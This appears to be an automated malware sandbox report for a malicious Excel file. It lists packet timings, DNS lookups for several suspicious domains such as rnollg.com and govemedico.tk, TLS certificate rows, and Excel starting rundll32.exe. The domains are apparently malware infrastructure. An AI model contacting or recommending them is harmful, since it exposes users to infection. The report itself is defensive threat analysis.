Jan 27, 2021 04:10:09.730282068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730310917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730317116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730354071 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735364914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735419035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735445023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735457897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735471010 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735495090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735507011 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735538960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735542059 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735583067 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735584974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735630035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735636950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735658884 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735675097 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735687971 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735711098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735716105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735729933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735744953 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735760927 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735774040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735788107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735810995 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735817909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735842943 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735857964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735872030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735884905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735901117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735924959 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735930920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735934973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735959053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.735977888 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.735985994 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.736001968 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.736031055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.736427069 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746691942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746731043 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746767998 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746778011 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746805906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746819019 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746829033 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746841908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746855974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746877909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746887922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746913910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.746928930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746954918 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.746961117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747003078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747005939 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747039080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747062922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747076035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747088909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747112989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747132063 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747148037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747185946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747189999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747203112 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747221947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747235060 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747267962 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747279882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747308969 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747323036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747344971 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747356892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747381926 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747395992 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747417927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747426987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747453928 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747468948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747489929 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747494936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747529030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747543097 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747574091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747575045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747617006 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747626066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747652054 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747668982 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747689009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747697115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747726917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747740984 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747760057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.747775078 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.747801065 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.750514030 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752062082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752103090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752137899 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752140045 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752172947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752175093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752182007 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752213001 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752229929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752249002 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752262115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752285957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752315998 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752322912 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752353907 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752377033 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752407074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752418995 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752453089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752456903 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752466917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752494097 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752512932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752523899 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752543926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752559900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752571106 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752598047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752615929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752634048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752648115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752681017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752687931 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752721071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752733946 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752757072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752778053 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752794027 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752801895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752830982 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752846956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752866030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752882004 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752903938 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752923012 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752940893 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752953053 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.752988100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.752994061 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753021002 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753046036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753057003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753068924 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753094912 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753119946 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753132105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753144979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753168106 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753191948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753205061 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753217936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753241062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753257990 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753285885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753288984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753329992 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753329992 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753365993 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753390074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753417015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753427982 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753468037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753483057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753493071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.753520012 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.753531933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.754640102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:40.948648930 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:40.970132113 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:40.970249891 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:40.999501944 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.020843029 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.022861004 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.022901058 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.022968054 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.023027897 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.031095982 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.052375078 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.052794933 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.052953005 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.407263994 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.428685904 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.816220045 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.816270113 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.816385031 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.816443920 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.823883057 CET	49166	443	192.168.2.22	172.67.200.147
Jan 27, 2021 04:10:41.845113039 CET	443	49166	172.67.200.147	192.168.2.22
Jan 27, 2021 04:10:41.935349941 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:41.956338882 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:41.956496000 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:41.958770037 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:41.979717970 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:41.982253075 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:41.982295036 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:41.982454062 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.001663923 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.022605896 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:42.022644997 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:42.022768021 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.041912079 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.062875032 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:42.451360941 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:42.451410055 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:42.451499939 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.451529980 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.458225965 CET	49167	443	192.168.2.22	172.67.198.109
Jan 27, 2021 04:10:42.479226112 CET	443	49167	172.67.198.109	192.168.2.22
Jan 27, 2021 04:10:42.584045887 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.605618000 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:42.605799913 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.607840061 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.628895998 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:42.638966084 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:42.639033079 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:42.639137983 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.639183044 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.657023907 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.678211927 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:42.678420067 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:42.678515911 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.698888063 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:42.720201015 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:43.127254009 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:43.127293110 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:10:43.127553940 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:43.139041901 CET	49168	443	192.168.2.22	172.67.158.184
Jan 27, 2021 04:10:43.160415888 CET	443	49168	172.67.158.184	192.168.2.22
Jan 27, 2021 04:12:08.824330091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:12:08.846134901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:12:08.846380949 CET	49165	443	192.168.2.22	172.67.150.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 04:10:08.897417068 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 04:10:08.919688940 CET	53	52197	8.8.8.8	192.168.2.22
Jan 27, 2021 04:10:40.906521082 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 04:10:40.924259901 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 04:10:41.914196968 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 04:10:41.932769060 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 04:10:42.504456043 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 04:10:42.579010963 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 04:10:08.897417068 CET	192.168.2.22	8.8.8.8	0x312a	Standard query (0)	rnollg.com	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:40.906521082 CET	192.168.2.22	8.8.8.8	0x9f05	Standard query (0)	gadgetswolf.com	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:41.914196968 CET	192.168.2.22	8.8.8.8	0x6f73	Standard query (0)	homesoapmolds.com	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:42.504456043 CET	192.168.2.22	8.8.8.8	0x226	Standard query (0)	govemedico.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 27, 2021 04:10:08.919688940 CET	8.8.8.8	192.168.2.22	0x312a	No error (0)	rnollg.com	172.67.150.228	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:08.919688940 CET	8.8.8.8	192.168.2.22	0x312a	No error (0)	rnollg.com	104.21.11.254	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:40.924259901 CET	8.8.8.8	192.168.2.22	0x9f05	No error (0)	gadgetswolf.com	172.67.200.147	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:40.924259901 CET	8.8.8.8	192.168.2.22	0x9f05	No error (0)	gadgetswolf.com	104.21.44.135	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:41.932769060 CET	8.8.8.8	192.168.2.22	0x6f73	No error (0)	homesoapmolds.com	172.67.198.109	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:41.932769060 CET	8.8.8.8	192.168.2.22	0x6f73	No error (0)	homesoapmolds.com	104.21.60.169	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:42.579010963 CET	8.8.8.8	192.168.2.22	0x226	No error (0)	govemedico.tk	172.67.158.184	A (IP address)	IN (0x0001)
Jan 27, 2021 04:10:42.579010963 CET	8.8.8.8	192.168.2.22	0x226	No error (0)	govemedico.tk	104.21.73.69	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 27, 2021 04:10:08.991039991 CET	172.67.150.228	443	192.168.2.22	49165	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:08.991039991 CET	172.67.150.228	443	192.168.2.22	49165	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:41.022901058 CET	172.67.200.147	443	192.168.2.22	49166	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:41.022901058 CET	172.67.200.147	443	192.168.2.22	49166	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:41.982295036 CET	172.67.198.109	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:41.982295036 CET	172.67.198.109	443	192.168.2.22	49167	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:42.639033079 CET	172.67.158.184	443	192.168.2.22	49168	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Thu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 27, 2021 04:10:42.639033079 CET	172.67.158.184	443	192.168.2.22	49168	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1464 Parent PID: 584

General

Start time:	04:09:38
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f0b0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2480 Parent PID: 1464

General

Start time:	04:09:44
Start date:	27/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
